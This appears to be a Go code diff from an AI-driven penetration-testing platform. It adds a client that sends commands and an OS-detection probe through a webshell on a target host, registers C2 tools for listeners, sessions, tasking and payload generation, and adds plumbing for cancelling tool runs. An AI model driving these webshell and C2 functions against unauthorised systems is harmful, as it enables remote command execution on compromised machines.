func TestBuildFileCommand_AutoFallbackMatchesLegacyBehavior(t *testing.T) {
|
||||
h := newTestWebShellHandler()
|
||||
|
||||
// asp + auto → windows 命令
|
||||
cmd, _ := h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: "asp"})
|
||||
if !strings.Contains(cmd, "dir /a") {
|
||||
t.Errorf("auto + asp should use Windows cmd, got: %s", cmd)
|
||||
}
|
||||
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: "aspx"})
|
||||
if !strings.Contains(cmd, "dir /a") {
|
||||
t.Errorf("auto + aspx should use Windows cmd, got: %s", cmd)
|
||||
}
|
||||
|
||||
// php/jsp/custom + auto → linux 命令(与历史行为一致)
|
||||
for _, st := range []string{"php", "jsp", "custom", ""} {
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: st})
|
||||
if !strings.Contains(cmd, "ls -la") {
|
||||
t.Errorf("auto + %q should use Linux cmd, got: %s", st, cmd)
|
||||
}
|
||||
}
|
||||
|
||||
// 显式 OS 覆盖 shellType
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "windows", ShellType: "php"})
|
||||
if !strings.Contains(cmd, "dir /a") {
|
||||
t.Errorf("explicit windows should override php shellType, got: %s", cmd)
|
||||
}
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "linux", ShellType: "asp"})
|
||||
if !strings.Contains(cmd, "ls -la") {
|
||||
t.Errorf("explicit linux should override asp shellType, got: %s", cmd)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,127 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"io"
|
||||
"net/http"
|
||||
"strings"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// webshellOSProbeCommand 探活命令:利用 Windows cmd 与 POSIX shell 对 `%OS%` 展开差异进行判定。
|
||||
// - Windows cmd:`%OS%` 被展开为 `Windows_NT`,回显 `:OSPROBE_Windows_NT:END`
|
||||
// - POSIX sh/bash:`%OS%` 不是变量语法,作为字面量原样保留,回显 `:OSPROBE_%OS%:END`
|
||||
//
|
||||
// 一条命令即可得到明确的、互斥的信号,避免探活成本(相比发两次命令)。
|
||||
// 冒号包裹是为了避免部分 shell 输出多余空白/BOM 时字符串匹配失效。
|
||||
const webshellOSProbeCommand = "echo :OSPROBE_%OS%:END"
|
||||
|
||||
// probeWebshellOSViaExec 通过一次命令执行的回显推断目标操作系统。
|
||||
//
|
||||
// 返回值:
|
||||
// - "windows" / "linux":识别成功
|
||||
// - "":无法判定(调用方应保留既有 fallback 逻辑)
|
||||
//
|
||||
// 入参 execFn 是一个"发命令并拿到回显"的闭包;让 HTTP 入口和 MCP 入口可以共用同一套探活逻辑
|
||||
// 而不必关心底层是如何发包的。
|
||||
func probeWebshellOSViaExec(execFn func(cmd string) (output string, ok bool)) string {
|
||||
if execFn == nil {
|
||||
return ""
|
||||
}
|
||||
out, ok := execFn(webshellOSProbeCommand)
|
||||
if !ok {
|
||||
return ""
|
||||
}
|
||||
return classifyWebshellOSProbeOutput(out)
|
||||
}
|
||||
|
||||
// classifyWebshellOSProbeOutput 纯函数:根据探活命令的回显判定 OS。
|
||||
// 抽出来是为了单测可直接覆盖所有分支,无需真实 HTTP 调用。
|
||||
func classifyWebshellOSProbeOutput(out string) string {
|
||||
if out == "" {
|
||||
return ""
|
||||
}
|
||||
lower := strings.ToLower(out)
|
||||
|
||||
// Windows 强信号:cmd.exe 成功展开了 %OS% 变量
|
||||
if strings.Contains(out, "Windows_NT") {
|
||||
return "windows"
|
||||
}
|
||||
// 容错:部分老版本 Windows 可能 `%OS%` 展开为其他字样(极少见),再看 PATH/OS 等次级线索
|
||||
if strings.Contains(lower, "microsoft windows") {
|
||||
return "windows"
|
||||
}
|
||||
|
||||
// Linux/Unix 强信号:`%OS%` 字面量被原样回显,说明 shell 不是 cmd.exe
|
||||
if strings.Contains(out, "%OS%") {
|
||||
return "linux"
|
||||
}
|
||||
|
||||
// 次级线索:部分 webshell 在 Linux 上可能走了其他外壳(如 zsh/ash),
|
||||
// 但它们对 `%OS%` 同样不展开;若命中 OSPROBE 头部却没拿到 %OS% 字面量,
|
||||
// 说明回显被中途截断或过滤,保守返回空让上层 fallback。
|
||||
return ""
|
||||
}
|
||||
|
||||
// newHTTPExecFn 为 HTTP FileOp 路径构造"发命令取回显"的闭包,供探活复用。
|
||||
// 参数来自 HTTP 请求,复用 buildExecURL / buildExecBody 两个已有的命令编排器,
|
||||
// 确保探活包与实际文件操作包走完全一致的 webshell 协议(GET/POST、参数名、编码)。
|
||||
func (h *WebShellHandler) newHTTPExecFn(targetURL, password, shellType, method, cmdParam, encoding string) func(string) (string, bool) {
|
||||
useGET := strings.ToUpper(strings.TrimSpace(method)) == "GET"
|
||||
if strings.TrimSpace(cmdParam) == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
return func(cmd string) (string, bool) {
|
||||
var (
|
||||
httpReq *http.Request
|
||||
err error
|
||||
)
|
||||
if useGET {
|
||||
u := h.buildExecURL(targetURL, shellType, password, cmdParam, cmd)
|
||||
httpReq, err = http.NewRequest(http.MethodGet, u, nil)
|
||||
} else {
|
||||
body := h.buildExecBody(shellType, password, cmdParam, cmd)
|
||||
httpReq, err = http.NewRequest(http.MethodPost, targetURL, bytes.NewReader(body))
|
||||
if err == nil {
|
||||
httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
return "", false
|
||||
}
|
||||
httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)")
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return "", false
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
raw, _ := io.ReadAll(resp.Body)
|
||||
return decodeWebshellOutput(raw, encoding), resp.StatusCode == http.StatusOK
|
||||
}
|
||||
}
|
||||
|
||||
// persistDetectedOS 把探活结果回写到连接表;失败只记日志不阻断主流程。
|
||||
// 设计上故意只触发 UPDATE,不会新建记录,因此即便 connectionID 不存在也只是悄悄放弃。
|
||||
func (h *WebShellHandler) persistDetectedOS(connectionID, detected string) {
|
||||
connectionID = strings.TrimSpace(connectionID)
|
||||
detected = normalizeWebshellOS(detected)
|
||||
if connectionID == "" || detected == "" || detected == "auto" {
|
||||
return
|
||||
}
|
||||
conn, err := h.db.GetWebshellConnection(connectionID)
|
||||
if err != nil || conn == nil {
|
||||
// 不是所有调用方都能提供有效 ID(比如临时测试),这里静默返回
|
||||
return
|
||||
}
|
||||
if normalizeWebshellOS(conn.OS) != "auto" {
|
||||
// 用户已经显式选过 OS,尊重用户选择,不自动覆盖
|
||||
return
|
||||
}
|
||||
conn.OS = detected
|
||||
if err := h.db.UpdateWebshellConnection(conn); err != nil {
|
||||
h.logger.Warn("webshell 探活结果持久化失败", zap.String("id", connectionID), zap.String("os", detected), zap.Error(err))
|
||||
return
|
||||
}
|
||||
h.logger.Info("webshell auto OS 探活成功并持久化", zap.String("id", connectionID), zap.String("os", detected))
|
||||
}
|
||||
@@ -0,0 +1,68 @@
|
||||
package handler
|
||||
|
||||
import "testing"
|
||||
|
||||
func TestClassifyWebshellOSProbeOutput(t *testing.T) {
|
||||
cases := []struct {
|
||||
name string
|
||||
in string
|
||||
want string
|
||||
}{
|
||||
{"Windows cmd 回显完整", ":OSPROBE_Windows_NT:END\r\n", "windows"},
|
||||
{"Windows cmd 回显带额外空行", "\r\n:OSPROBE_Windows_NT:END\r\n", "windows"},
|
||||
{"Windows 次级线索 - ver banner", "Microsoft Windows [版本 10.0.19045]\r\n", "windows"},
|
||||
{"Linux sh 字面量回显", ":OSPROBE_%OS%:END\n", "linux"},
|
||||
{"Linux 紧凑输出(无换行)", ":OSPROBE_%OS%:END", "linux"},
|
||||
{"空输出 - 无法判定", "", ""},
|
||||
{"被过滤的输出 - 无法判定", "something weird", ""},
|
||||
{"仅有 OSPROBE 前缀但被截断 - 保守返回空", ":OSPROBE_:END", ""},
|
||||
}
|
||||
for _, c := range cases {
|
||||
if got := classifyWebshellOSProbeOutput(c.in); got != c.want {
|
||||
t.Errorf("case %q: got %q, want %q", c.name, got, c.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_SendsOneCommandOnly(t *testing.T) {
|
||||
var calls []string
|
||||
fn := func(cmd string) (string, bool) {
|
||||
calls = append(calls, cmd)
|
||||
return ":OSPROBE_Windows_NT:END", true
|
||||
}
|
||||
got := probeWebshellOSViaExec(fn)
|
||||
if got != "windows" {
|
||||
t.Fatalf("want windows, got %q", got)
|
||||
}
|
||||
if len(calls) != 1 {
|
||||
t.Fatalf("probe should issue exactly one exec call, got %d: %v", len(calls), calls)
|
||||
}
|
||||
if calls[0] != webshellOSProbeCommand {
|
||||
t.Errorf("probe command mismatch: got %q", calls[0])
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_NotOkReturnsEmpty(t *testing.T) {
|
||||
// HTTP 非 200 的场景:execFn 返回 ok=false,探活应放弃
|
||||
fn := func(cmd string) (string, bool) { return "whatever", false }
|
||||
if got := probeWebshellOSViaExec(fn); got != "" {
|
||||
t.Errorf("want empty when exec not ok, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_NilSafeguard(t *testing.T) {
|
||||
if got := probeWebshellOSViaExec(nil); got != "" {
|
||||
t.Errorf("nil execFn should return empty, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_LinuxUname(t *testing.T) {
|
||||
// 某些 webshell 对 `%OS%` 字面量也会过滤(例如安全规则),
|
||||
// 但主要路径是"%OS% 字面量被原样回显"。这里覆盖标准 Linux 场景。
|
||||
fn := func(cmd string) (string, bool) {
|
||||
return ":OSPROBE_%OS%:END\n", true
|
||||
}
|
||||
if got := probeWebshellOSViaExec(fn); got != "linux" {
|
||||
t.Errorf("Linux case: want linux, got %q", got)
|
||||
}
|
||||
}
|
||||
@@ -37,6 +37,16 @@ const (
|
||||
ToolBatchTaskAdd = "batch_task_add_task"
|
||||
ToolBatchTaskUpdate = "batch_task_update_task"
|
||||
ToolBatchTaskRemove = "batch_task_remove_task"
|
||||
|
||||
// C2 工具集(合并同类项,8 个统一工具)
|
||||
ToolC2Listener = "c2_listener" // 监听器管理(create/start/stop/list/get/update/delete)
|
||||
ToolC2Session = "c2_session" // 会话管理(list/get/set_sleep/kill/delete)
|
||||
ToolC2Task = "c2_task" // 任务下发(统一 task_type 参数)
|
||||
ToolC2TaskManage = "c2_task_manage" // 任务管理(get_result/wait/list/cancel)
|
||||
ToolC2Payload = "c2_payload" // Payload 生成(oneliner/build)
|
||||
ToolC2Event = "c2_event" // 事件查询
|
||||
ToolC2Profile = "c2_profile" // Malleable Profile 管理(list/get/create/update/delete)
|
||||
ToolC2File = "c2_file" // 文件管理(list/get_result)
|
||||
)
|
||||
|
||||
// IsBuiltinTool 检查工具名称是否是内置工具
|
||||
@@ -66,7 +76,16 @@ func IsBuiltinTool(toolName string) bool {
|
||||
ToolBatchTaskScheduleEnabled,
|
||||
ToolBatchTaskAdd,
|
||||
ToolBatchTaskUpdate,
|
||||
ToolBatchTaskRemove:
|
||||
ToolBatchTaskRemove,
|
||||
// C2 工具
|
||||
ToolC2Listener,
|
||||
ToolC2Session,
|
||||
ToolC2Task,
|
||||
ToolC2TaskManage,
|
||||
ToolC2Payload,
|
||||
ToolC2Event,
|
||||
ToolC2Profile,
|
||||
ToolC2File:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
@@ -101,5 +120,14 @@ func GetAllBuiltinTools() []string {
|
||||
ToolBatchTaskAdd,
|
||||
ToolBatchTaskUpdate,
|
||||
ToolBatchTaskRemove,
|
||||
// C2 工具
|
||||
ToolC2Listener,
|
||||
ToolC2Session,
|
||||
ToolC2Task,
|
||||
ToolC2TaskManage,
|
||||
ToolC2Payload,
|
||||
ToolC2Event,
|
||||
ToolC2Profile,
|
||||
ToolC2File,
|
||||
}
|
||||
}
|
||||
|
||||
@@ -32,6 +32,8 @@ type ExternalMCPManager struct {
|
||||
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
|
||||
refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积
|
||||
mu sync.RWMutex
|
||||
runningCancels map[string]context.CancelFunc
|
||||
abortUserNotes map[string]string
|
||||
}
|
||||
|
||||
// NewExternalMCPManager 创建外部MCP管理器
|
||||
@@ -42,16 +44,18 @@ func NewExternalMCPManager(logger *zap.Logger) *ExternalMCPManager {
|
||||
// NewExternalMCPManagerWithStorage 创建外部MCP管理器(带持久化存储)
|
||||
func NewExternalMCPManagerWithStorage(logger *zap.Logger, storage MonitorStorage) *ExternalMCPManager {
|
||||
manager := &ExternalMCPManager{
|
||||
clients: make(map[string]ExternalMCPClient),
|
||||
configs: make(map[string]config.ExternalMCPServerConfig),
|
||||
logger: logger,
|
||||
storage: storage,
|
||||
executions: make(map[string]*ToolExecution),
|
||||
stats: make(map[string]*ToolStats),
|
||||
errors: make(map[string]string),
|
||||
toolCounts: make(map[string]int),
|
||||
toolCache: make(map[string][]Tool),
|
||||
stopRefresh: make(chan struct{}),
|
||||
clients: make(map[string]ExternalMCPClient),
|
||||
configs: make(map[string]config.ExternalMCPServerConfig),
|
||||
logger: logger,
|
||||
storage: storage,
|
||||
executions: make(map[string]*ToolExecution),
|
||||
stats: make(map[string]*ToolStats),
|
||||
errors: make(map[string]string),
|
||||
toolCounts: make(map[string]int),
|
||||
toolCache: make(map[string][]Tool),
|
||||
stopRefresh: make(chan struct{}),
|
||||
runningCancels: make(map[string]context.CancelFunc),
|
||||
abortUserNotes: make(map[string]string),
|
||||
}
|
||||
// 启动后台刷新工具数量的goroutine
|
||||
manager.startToolCountRefresh()
|
||||
@@ -452,8 +456,18 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
|
||||
}
|
||||
}
|
||||
|
||||
execCtx, runCancel := context.WithCancel(ctx)
|
||||
m.registerRunningCancel(executionID, runCancel)
|
||||
notifyToolRunBegin(ctx, executionID)
|
||||
defer func() {
|
||||
notifyToolRunEnd(ctx, executionID)
|
||||
runCancel()
|
||||
m.unregisterRunningCancel(executionID)
|
||||
}()
|
||||
|
||||
// 调用工具
|
||||
result, err := client.CallTool(ctx, actualToolName, args)
|
||||
result, err := client.CallTool(execCtx, actualToolName, args)
|
||||
cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
|
||||
|
||||
// 更新执行记录
|
||||
m.mu.Lock()
|
||||
@@ -462,16 +476,23 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
|
||||
execution.Duration = now.Sub(execution.StartTime)
|
||||
|
||||
if err != nil {
|
||||
execution.Status = "failed"
|
||||
execution.Error = err.Error()
|
||||
st, msg := executionStatusAndMessage(err)
|
||||
execution.Status = st
|
||||
execution.Error = msg
|
||||
} else if result != nil && result.IsError {
|
||||
execution.Status = "failed"
|
||||
if len(result.Content) > 0 {
|
||||
execution.Error = result.Content[0].Text
|
||||
if cancelledWithUserNote {
|
||||
execution.Status = "cancelled"
|
||||
execution.Error = ""
|
||||
execution.Result = result
|
||||
} else {
|
||||
execution.Error = "工具执行返回错误结果"
|
||||
execution.Status = "failed"
|
||||
if len(result.Content) > 0 {
|
||||
execution.Error = result.Content[0].Text
|
||||
} else {
|
||||
execution.Error = "工具执行返回错误结果"
|
||||
}
|
||||
execution.Result = result
|
||||
}
|
||||
execution.Result = result
|
||||
} else {
|
||||
execution.Status = "completed"
|
||||
if result == nil {
|
||||
@@ -509,6 +530,50 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
|
||||
return result, executionID, nil
|
||||
}
|
||||
|
||||
func (m *ExternalMCPManager) applyAbortUserNoteToCancelledToolResult(executionID string, result **ToolResult, err *error) (cancelledWithUserNote bool) {
|
||||
note := strings.TrimSpace(m.readAbortUserNote(executionID))
|
||||
if note == "" {
|
||||
return false
|
||||
}
|
||||
hasErr := err != nil && *err != nil
|
||||
hasRes := result != nil && *result != nil
|
||||
if !hasErr && !hasRes {
|
||||
return false
|
||||
}
|
||||
_ = m.takeAbortUserNote(executionID)
|
||||
partial := ""
|
||||
if hasRes {
|
||||
partial = ToolResultPlainText(*result)
|
||||
}
|
||||
if partial == "" && hasErr {
|
||||
partial = (*err).Error()
|
||||
}
|
||||
merged := MergePartialToolOutputAndAbortNote(partial, note)
|
||||
*err = nil
|
||||
*result = &ToolResult{Content: []Content{{Type: "text", Text: merged}}, IsError: true}
|
||||
return true
|
||||
}
|
||||
|
||||
func (m *ExternalMCPManager) readAbortUserNote(id string) string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if m.abortUserNotes == nil {
|
||||
return ""
|
||||
}
|
||||
return m.abortUserNotes[id]
|
||||
}
|
||||
|
||||
func (m *ExternalMCPManager) takeAbortUserNote(id string) string {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if m.abortUserNotes == nil {
|
||||
return ""
|
||||
}
|
||||
n := m.abortUserNotes[id]
|
||||
delete(m.abortUserNotes, id)
|
||||
return n
|
||||
}
|
||||
|
||||
// cleanupOldExecutions 清理旧的执行记录(保持内存中的记录数量在限制内)
|
||||
func (m *ExternalMCPManager) cleanupOldExecutions() {
|
||||
const maxExecutionsInMemory = 1000
|
||||
@@ -562,6 +627,42 @@ func (m *ExternalMCPManager) GetExecution(id string) (*ToolExecution, bool) {
|
||||
return nil, false
|
||||
}
|
||||
|
||||
func (m *ExternalMCPManager) registerRunningCancel(id string, cancel context.CancelFunc) {
|
||||
m.mu.Lock()
|
||||
m.runningCancels[id] = cancel
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
func (m *ExternalMCPManager) unregisterRunningCancel(id string) {
|
||||
m.mu.Lock()
|
||||
delete(m.runningCancels, id)
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// CancelToolExecutionWithNote 取消外部 MCP 工具;note 非空时与已返回输出合并后交给模型。
|
||||
func (m *ExternalMCPManager) CancelToolExecutionWithNote(id string, note string) bool {
|
||||
m.mu.Lock()
|
||||
cancel, ok := m.runningCancels[id]
|
||||
if !ok || cancel == nil {
|
||||
m.mu.Unlock()
|
||||
return false
|
||||
}
|
||||
if strings.TrimSpace(note) != "" {
|
||||
if m.abortUserNotes == nil {
|
||||
m.abortUserNotes = make(map[string]string)
|
||||
}
|
||||
m.abortUserNotes[id] = strings.TrimSpace(note)
|
||||
}
|
||||
m.mu.Unlock()
|
||||
cancel()
|
||||
return true
|
||||
}
|
||||
|
||||
// CancelToolExecution 取消正在执行的外部 MCP 工具(无用户说明)。
|
||||
func (m *ExternalMCPManager) CancelToolExecution(id string) bool {
|
||||
return m.CancelToolExecutionWithNote(id, "")
|
||||
}
|
||||
|
||||
// updateStats 更新统计信息
|
||||
func (m *ExternalMCPManager) updateStats(toolName string, failed bool) {
|
||||
now := time.Now()
|
||||
|
||||
@@ -0,0 +1,77 @@
|
||||
package mcp
|
||||
|
||||
import (
|
||||
"context"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// ToolRunRegistry 在工具开始/结束时登记当前 executionId,供对话页「仅终止当前工具」与监控页共用取消逻辑。
|
||||
type ToolRunRegistry interface {
|
||||
RegisterRunningTool(conversationID, executionID string)
|
||||
UnregisterRunningTool(conversationID, executionID string)
|
||||
}
|
||||
|
||||
type toolRunRegistryCtxKey struct{}
|
||||
type mcpConversationIDCtxKey struct{}
|
||||
|
||||
// WithToolRunRegistry 将登记器注入 ctx(Eino / 原生 Agent 任务 ctx)。
|
||||
func WithToolRunRegistry(ctx context.Context, reg ToolRunRegistry) context.Context {
|
||||
if ctx == nil || reg == nil {
|
||||
return ctx
|
||||
}
|
||||
return context.WithValue(ctx, toolRunRegistryCtxKey{}, reg)
|
||||
}
|
||||
|
||||
// ToolRunRegistryFromContext 取出登记器(无则 nil)。
|
||||
func ToolRunRegistryFromContext(ctx context.Context) ToolRunRegistry {
|
||||
if ctx == nil {
|
||||
return nil
|
||||
}
|
||||
v, _ := ctx.Value(toolRunRegistryCtxKey{}).(ToolRunRegistry)
|
||||
return v
|
||||
}
|
||||
|
||||
// WithMCPConversationID 将对话 ID 注入 ctx,供 CallTool 内与 executionId 关联。
|
||||
func WithMCPConversationID(ctx context.Context, conversationID string) context.Context {
|
||||
if ctx == nil {
|
||||
return nil
|
||||
}
|
||||
id := strings.TrimSpace(conversationID)
|
||||
if id == "" {
|
||||
return ctx
|
||||
}
|
||||
return context.WithValue(ctx, mcpConversationIDCtxKey{}, id)
|
||||
}
|
||||
|
||||
// MCPConversationIDFromContext 读取对话 ID。
|
||||
func MCPConversationIDFromContext(ctx context.Context) string {
|
||||
if ctx == nil {
|
||||
return ""
|
||||
}
|
||||
v, _ := ctx.Value(mcpConversationIDCtxKey{}).(string)
|
||||
return v
|
||||
}
|
||||
|
||||
func notifyToolRunBegin(ctx context.Context, executionID string) {
|
||||
reg := ToolRunRegistryFromContext(ctx)
|
||||
if reg == nil {
|
||||
return
|
||||
}
|
||||
conv := MCPConversationIDFromContext(ctx)
|
||||
if conv == "" || strings.TrimSpace(executionID) == "" {
|
||||
return
|
||||
}
|
||||
reg.RegisterRunningTool(conv, executionID)
|
||||
}
|
||||
|
||||
func notifyToolRunEnd(ctx context.Context, executionID string) {
|
||||
reg := ToolRunRegistryFromContext(ctx)
|
||||
if reg == nil {
|
||||
return
|
||||
}
|
||||
conv := MCPConversationIDFromContext(ctx)
|
||||
if conv == "" || strings.TrimSpace(executionID) == "" {
|
||||
return
|
||||
}
|
||||
reg.UnregisterRunningTool(conv, executionID)
|
||||
}
|
||||
+235
-22
@@ -4,6 +4,7 @@ import (
|
||||
"bufio"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
@@ -40,6 +41,13 @@ type Server struct {
|
||||
logger *zap.Logger
|
||||
maxExecutionsInMemory int // 内存中最大执行记录数
|
||||
sseClients map[string]*sseClient
|
||||
runningCancels map[string]context.CancelFunc
|
||||
runningCancelsMu sync.Mutex
|
||||
abortUserNotes map[string]string // 监控页终止时附带的用户说明,与 executionID 对应
|
||||
// httpToolTimeoutMinutes 同步 agent.tool_timeout_minutes,用于 POST /api/mcp 的 tools/call(不经 Agent 包装的路径)。
|
||||
// nil 表示未配置,沿用默认 30 分钟;指向 0 表示不限制;>0 为分钟数。
|
||||
httpToolTimeoutMinutes *int
|
||||
httpToolTimeoutMu sync.RWMutex
|
||||
}
|
||||
|
||||
type sseClient struct {
|
||||
@@ -50,6 +58,13 @@ type sseClient struct {
|
||||
// ToolHandler 工具处理函数
|
||||
type ToolHandler func(ctx context.Context, args map[string]interface{}) (*ToolResult, error)
|
||||
|
||||
func executionStatusAndMessage(err error) (status string, errMsg string) {
|
||||
if errors.Is(err, context.Canceled) {
|
||||
return "cancelled", "已手动终止(MCP 监控)"
|
||||
}
|
||||
return "failed", err.Error()
|
||||
}
|
||||
|
||||
// NewServer 创建新的MCP服务器
|
||||
func NewServer(logger *zap.Logger) *Server {
|
||||
return NewServerWithStorage(logger, nil)
|
||||
@@ -68,6 +83,8 @@ func NewServerWithStorage(logger *zap.Logger, storage MonitorStorage) *Server {
|
||||
logger: logger,
|
||||
maxExecutionsInMemory: 1000, // 默认最多在内存中保留1000条执行记录
|
||||
sseClients: make(map[string]*sseClient),
|
||||
runningCancels: make(map[string]context.CancelFunc),
|
||||
abortUserNotes: make(map[string]string),
|
||||
}
|
||||
|
||||
// 初始化默认提示词和资源
|
||||
@@ -77,6 +94,39 @@ func NewServerWithStorage(logger *zap.Logger, storage MonitorStorage) *Server {
|
||||
return s
|
||||
}
|
||||
|
||||
// ConfigureHTTPToolCallTimeoutFromAgentMinutes 将 agent.tool_timeout_minutes 同步到经 HTTP POST /api/mcp 触发的 tools/call。
|
||||
// minutes<=0 表示不设置硬性截止时间(与配置「0 不限制」一致);minutes>0 为该次调用的最长等待时间。
|
||||
// 未调用前对 tools/call 使用默认 30 分钟(与历史硬编码一致)。
|
||||
func (s *Server) ConfigureHTTPToolCallTimeoutFromAgentMinutes(minutes int) {
|
||||
if s == nil {
|
||||
return
|
||||
}
|
||||
v := minutes
|
||||
if v < 0 {
|
||||
v = 0
|
||||
}
|
||||
s.httpToolTimeoutMu.Lock()
|
||||
defer s.httpToolTimeoutMu.Unlock()
|
||||
s.httpToolTimeoutMinutes = &v
|
||||
}
|
||||
|
||||
func (s *Server) effectiveHTTPToolCallDeadline() (context.Context, context.CancelFunc) {
|
||||
const defaultDur = 30 * time.Minute
|
||||
if s == nil {
|
||||
return context.WithTimeout(context.Background(), defaultDur)
|
||||
}
|
||||
s.httpToolTimeoutMu.RLock()
|
||||
mPtr := s.httpToolTimeoutMinutes
|
||||
s.httpToolTimeoutMu.RUnlock()
|
||||
if mPtr == nil {
|
||||
return context.WithTimeout(context.Background(), defaultDur)
|
||||
}
|
||||
if *mPtr <= 0 {
|
||||
return context.WithCancel(context.Background())
|
||||
}
|
||||
return context.WithTimeout(context.Background(), time.Duration(*mPtr)*time.Minute)
|
||||
}
|
||||
|
||||
// RegisterTool 注册工具
|
||||
func (s *Server) RegisterTool(tool Tool, handler ToolHandler) {
|
||||
s.mu.Lock()
|
||||
@@ -444,15 +494,22 @@ func (s *Server) handleCallTool(msg *Message) *Message {
|
||||
}
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Minute)
|
||||
defer cancel()
|
||||
baseCtx, timeoutCancel := s.effectiveHTTPToolCallDeadline()
|
||||
defer timeoutCancel()
|
||||
execCtx, runCancel := context.WithCancel(baseCtx)
|
||||
s.registerRunningCancel(executionID, runCancel)
|
||||
defer func() {
|
||||
runCancel()
|
||||
s.unregisterRunningCancel(executionID)
|
||||
}()
|
||||
|
||||
s.logger.Info("开始执行工具",
|
||||
zap.String("toolName", req.Name),
|
||||
zap.Any("arguments", req.Arguments),
|
||||
)
|
||||
|
||||
result, err := handler(ctx, req.Arguments)
|
||||
result, err := handler(execCtx, req.Arguments)
|
||||
cancelledWithUserNote := s.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
|
||||
now := time.Now()
|
||||
var failed bool
|
||||
var finalResult *ToolResult
|
||||
@@ -462,18 +519,26 @@ func (s *Server) handleCallTool(msg *Message) *Message {
|
||||
execution.Duration = now.Sub(execution.StartTime)
|
||||
|
||||
if err != nil {
|
||||
execution.Status = "failed"
|
||||
execution.Error = err.Error()
|
||||
st, msg := executionStatusAndMessage(err)
|
||||
execution.Status = st
|
||||
execution.Error = msg
|
||||
failed = true
|
||||
} else if result != nil && result.IsError {
|
||||
execution.Status = "failed"
|
||||
if len(result.Content) > 0 {
|
||||
execution.Error = result.Content[0].Text
|
||||
if cancelledWithUserNote {
|
||||
execution.Status = "cancelled"
|
||||
execution.Error = ""
|
||||
execution.Result = result
|
||||
failed = true
|
||||
} else {
|
||||
execution.Error = "工具执行返回错误结果"
|
||||
execution.Status = "failed"
|
||||
if len(result.Content) > 0 {
|
||||
execution.Error = result.Content[0].Text
|
||||
} else {
|
||||
execution.Error = "工具执行返回错误结果"
|
||||
}
|
||||
execution.Result = result
|
||||
failed = true
|
||||
}
|
||||
execution.Result = result
|
||||
failed = true
|
||||
} else {
|
||||
execution.Status = "completed"
|
||||
if result == nil {
|
||||
@@ -510,9 +575,13 @@ func (s *Server) handleCallTool(msg *Message) *Message {
|
||||
zap.Error(err),
|
||||
)
|
||||
|
||||
errText := fmt.Sprintf("工具执行失败: %v", err)
|
||||
if errors.Is(err, context.Canceled) {
|
||||
errText = "工具执行已手动终止(MCP 监控)。后续编排步骤可继续。"
|
||||
}
|
||||
errorResult, _ := json.Marshal(CallToolResponse{
|
||||
Content: []Content{
|
||||
{Type: "text", Text: fmt.Sprintf("工具执行失败: %v", err)},
|
||||
{Type: "text", Text: errText},
|
||||
},
|
||||
IsError: true,
|
||||
})
|
||||
@@ -769,7 +838,17 @@ func (s *Server) CallTool(ctx context.Context, toolName string, args map[string]
|
||||
}
|
||||
}
|
||||
|
||||
result, err := handler(ctx, args)
|
||||
execCtx, runCancel := context.WithCancel(ctx)
|
||||
s.registerRunningCancel(executionID, runCancel)
|
||||
notifyToolRunBegin(ctx, executionID)
|
||||
defer func() {
|
||||
notifyToolRunEnd(ctx, executionID)
|
||||
runCancel()
|
||||
s.unregisterRunningCancel(executionID)
|
||||
}()
|
||||
|
||||
result, err := handler(execCtx, args)
|
||||
cancelledWithUserNote := s.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
|
||||
|
||||
s.mu.Lock()
|
||||
now := time.Now()
|
||||
@@ -779,19 +858,28 @@ func (s *Server) CallTool(ctx context.Context, toolName string, args map[string]
|
||||
var finalResult *ToolResult
|
||||
|
||||
if err != nil {
|
||||
execution.Status = "failed"
|
||||
execution.Error = err.Error()
|
||||
st, msg := executionStatusAndMessage(err)
|
||||
execution.Status = st
|
||||
execution.Error = msg
|
||||
failed = true
|
||||
} else if result != nil && result.IsError {
|
||||
execution.Status = "failed"
|
||||
if len(result.Content) > 0 {
|
||||
execution.Error = result.Content[0].Text
|
||||
if cancelledWithUserNote {
|
||||
execution.Status = "cancelled"
|
||||
execution.Error = ""
|
||||
execution.Result = result
|
||||
failed = true
|
||||
finalResult = result
|
||||
} else {
|
||||
execution.Error = "工具执行返回错误结果"
|
||||
execution.Status = "failed"
|
||||
